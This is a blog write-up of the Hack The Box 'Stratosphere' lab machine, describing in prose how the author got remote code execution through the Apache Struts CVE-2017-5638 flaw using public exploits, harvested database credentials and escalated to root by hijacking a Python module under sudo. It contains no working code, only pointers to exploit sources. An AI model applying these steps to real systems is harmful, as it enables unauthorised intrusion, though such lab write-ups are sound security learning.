HTB Stratosphere Write-Up

Introduction

The box was pretty fun with some rabbit holes which can really frustrate someone (personal experience) once the vulnerability has been exposed things do not go easy from there as the boxes itself has many protections in it. I am going to show you how I owned this box. So basically the “http” running Apache Tomcat was vulnerable to Apache struts vulnerability, leveraging that we get credential information of a user, ssh in and then do a DLL Injection Privilege Escalation to get root.

Initial Enumeration

The first enumeration is starting an nmap scan and brute forcing website directories. For this specific purpose I created a Automation tool called “AutoRecon” which I use here, but you can always do this manually.

Stratosphere
Gobuster scan
Login on the http://10.10.10.64/manager
http://10.10.10.64/Monitoring/example/Welcome.action
Under Construction!

Apache Struts Vulnerability

I noticed that the urls of the second website were kind of strange, I’ve never seen them before.

*crack

Exploitation

So, if RCE is possible then we should be able to get a Reverse Shell and subsequently own the box, I found an exploit via searchsploit (https://www.exploit-db.com/exploits/41570) but there was a trouble. My first plan was to play around the RCE then use reverse shell commands to get me a shell via netcat but that required multiple line commands and this exploit only allowed single argument commands like “ls”, “whoami” and so on. I tried to change this but only ended up complicating things. No doubt this is what I wanted (all the single argument commands worked) but the exploit needs to be modified a bit. I searched “CVE 2017–5638 git-hub” and I got across this beautiful repo https://github.com/mazen160/struts-pwn. This exploit had exactly what I wanted I can run multiple commands at once (“I’m great at things like this *>_<).

Retrieving credentials from Database

richard should secure his account asap

Privilege Escalation — DLL Injection

HTB has taught me many things, and one of them is abusing sudo to get an escalation. So that’s what I do! sudo -l

the original hashlib.py in the /usr/lib/python2.7 directory
custom made hashlib.py (exploit) in /home/richard

Conclusion

In the end, I enjoyed this box I was so frustrated in the beginning and I ignored what’s in front of me for so long just goes to show how well these are made! There were many Rabbit Holes in this one! After finishing the box I tested DLL Injection on my home Kali Machine too and yes it was vulnerable but since I am the only user so that should not be a problem but it can be a problem in a multi-user environment. This was my first Blog post I hope you enjoyed it! I plan to post more security related stuff, write-ups, exploits, cves and the like, so please look forward to it. Any suggestion or improvements in my steps are greatly welcomed!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store